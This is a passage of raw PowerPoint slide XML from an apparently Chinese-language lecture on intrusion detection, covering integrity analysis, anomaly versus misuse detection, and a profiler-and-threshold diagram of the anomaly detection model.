                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>完整性分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113667" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF480513-722B-4F37-888D-031AC6EBDD50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="2209800"/>
            <a:ext cx="7772400" cy="2286000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>完整性分析主要关注某个文件或对象是否被更改，这经常包括文件和目录的内容及属性，它在发现被更改的、被安装木马的应用程序方面特别有效</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1"/>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6BD9EA6D-A935-445C-8C1F-28D662079ACF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵检测的分类（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114691" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFABC74F-873B-4784-91B0-9CA0663166FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2209800"/>
            <a:ext cx="8001000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>按照分析方法（检测方法）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>异常检测模型（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Anomaly Detection ):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>首先总结正常操作应该具有的特征（用户轮廓），</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>当用户活动与正常行为有重大偏离时即被认为是入侵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>误用检测模型（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Misuse Detection)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>收集非正常操作的行为特征，建立相关的特征库，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>当监测的用户或系统行为与库中的记录相匹配时，系统就认为这种行为是入侵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAF0480D-D8E0-404C-857A-C9029E3446DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1219200" y="9906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zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>异常检测</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="115715" name="Group 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F8BBF57-3272-473C-A0FC-C35732804030}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="2057400"/>
            <a:ext cx="7034213" cy="4324350"/>
            <a:chOff x="1296" y="1680"/>
            <a:chExt cx="3312" cy="2448"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="115716" name="Rectangle 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45477964-35C1-48FF-8F47-10BA66619CFC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1296" y="1680"/>
              <a:ext cx="3312" cy="244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15717" name="Group 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88479B1F-D232-4C7E-A14C-9DE953EAF1E9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="1776"/>
              <a:ext cx="3192" cy="2326"/>
              <a:chOff x="2520" y="7494"/>
              <a:chExt cx="7979" cy="5817"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="115718" name="Text Box 4">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5790A79-B793-4527-9DEA-68459BFA946C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7560" y="8616"/>
                <a:ext cx="2939" cy="5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1200" noProof="1">
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>Below Threshold levels</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1200">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="115719" name="Text Box 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C51D47E6-DDAE-4766-9667-64339D69BFF6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7560" y="10644"/>
                <a:ext cx="2759" cy="6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1200">
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>Exceed Threshold Levels</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="115720" name="AutoShape 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91321C55-BB9D-436D-900F-ACED9B1FD63D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2520" y="7836"/>
                <a:ext cx="1620" cy="624"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 25000"/>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1200" noProof="1">
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>System Audit</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1200">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="115721" name="Group 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B426B54A-5404-40DF-B909-B22E98D13B75}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3300" y="8505"/>
                <a:ext cx="1440" cy="1278"/>
                <a:chOff x="1584" y="11232"/>
                <a:chExt cx="864" cy="576"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="115730" name="Text Box 8">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{402BBA17-F9C0-4EFA-8139-91F094A02A4E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1">
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1584" y="11376"/>
                  <a:ext cx="864"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1200" noProof="1">
                      <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    </a:rPr>
                    <a:t>Metrics</a:t>
                  </a:r>
                  <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="800">
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="115731" name="Line 9">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E129CC1-3C2D-444C-A86D-BE41FA6978AB}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1584" y="11232"/>
                  <a:ext cx="0" cy="5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32" name="Line 10">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31E7A3D2-1331-4D29-AEDF-99E9DCFE7A03}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="1584" y="11808"/>
                  <a:ext cx="86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15722" name="Rectangle 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0A8A808-053D-469A-A5C6-6DD6D255DD82}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4740" y="9463"/>
                <a:ext cx="1200" cy="713"/>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1200" noProof="1">
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>Profiler</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1000" b="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="115723" name="Line 12">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9AF3CDCB-774C-4405-AD79-889478ED5C40}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5940" y="9864"/>
                <a:ext cx="12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5724" name="AutoShape 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4F64949-C58B-464C-9F98-84825A29098D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7200" y="9356"/>
                <a:ext cx="720" cy="959"/>
              </a:xfrm>
              <a:prstGeom prst="diamond">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15725" name="Line 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A853FBE-F241-466A-8892-7A81F762951E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7547" y="10332"/>
                <a:ext cx="13" cy="124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6" name="Oval 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0761735A-DA17-40EC-ADC6-E75E5580D532}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6760" y="11580"/>
                <a:ext cx="1700" cy="664"/>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1200" noProof="1">
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>Intrusion</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="800">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="115727" name="Line 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3109630-217A-4097-9715-1F705BB5C4D5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="7547" y="8304"/>
                <a:ext cx="13" cy="108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5728" name="Oval 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C4765C2-F855-410B-BD49-B4F915B12A4A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6300" y="7494"/>
                <a:ext cx="2520" cy="810"/>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1200" noProof="1">
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>Normal Activity</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="800">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="115729" name="Text Box 18">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36E8627B-68AC-4BEB-BF5A-93F67018CF64}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4860" y="12672"/>
                <a:ext cx="2160" cy="6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ts val="1400"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="1450"/>
                  </a:spcAft>
                  <a:buClrTx/>
                  <a:buSzTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1400" b="1">
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>异常检测模型</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="800" b="1">
                  <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:gr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1026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F84ECB21-6ED0-4D86-8143-F44D364CF750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2133600"/>
            <a:ext cx="76962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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>前提：入侵是异常活动的子集 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>用户轮廓</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>(Profile): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>通常定义为各种行为参数及其阀值的集合，用于描述正常行为范围</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>过程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>   监控   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>量化  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>比较  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>判定 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>                         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF6600"/>
              </a:solidFill>
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
